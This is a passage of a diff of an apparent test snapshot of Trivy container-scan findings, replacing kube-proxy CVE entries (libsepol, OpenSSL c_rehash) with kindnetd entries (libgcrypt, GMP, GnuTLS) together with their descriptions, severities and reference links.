"URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-43618", + "installedVersion": "2:6.1.2+dfsg-4", + "packageName": "libgmp10", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/8", + "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "https://access.redhat.com/security/cve/CVE-2021-43618", + "https://bugs.debian.org/994405", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "https://security.netapp.com/advisory/ntap-20221111-0001/", + "https://ubuntu.com/security/notices/USN-5672-1", + "https://ubuntu.com/security/notices/USN-5672-2", + "https://www.cve.org/CVERecord?id=CVE-2021-43618", + ], + }, + "category": "Vulnerability", + "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Integer overflow and resultant buffer overflow via crafted input", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2021-43618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "http://seclists.org/fulldisclosure/2022/Oct/8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-43618", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugs.debian.org/994405", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-5672-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5672-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20231", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2021-20231", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20231.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "gnutls: Use after free in client key_share extension", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://avd.aquasec.com/nvd/cve-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20232", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2021-20232", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20232.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://avd.aquasec.com/nvd/cve-2021-20232", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", + "value": "https://access.redhat.com/security/cve/CVE-2021-20232", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": 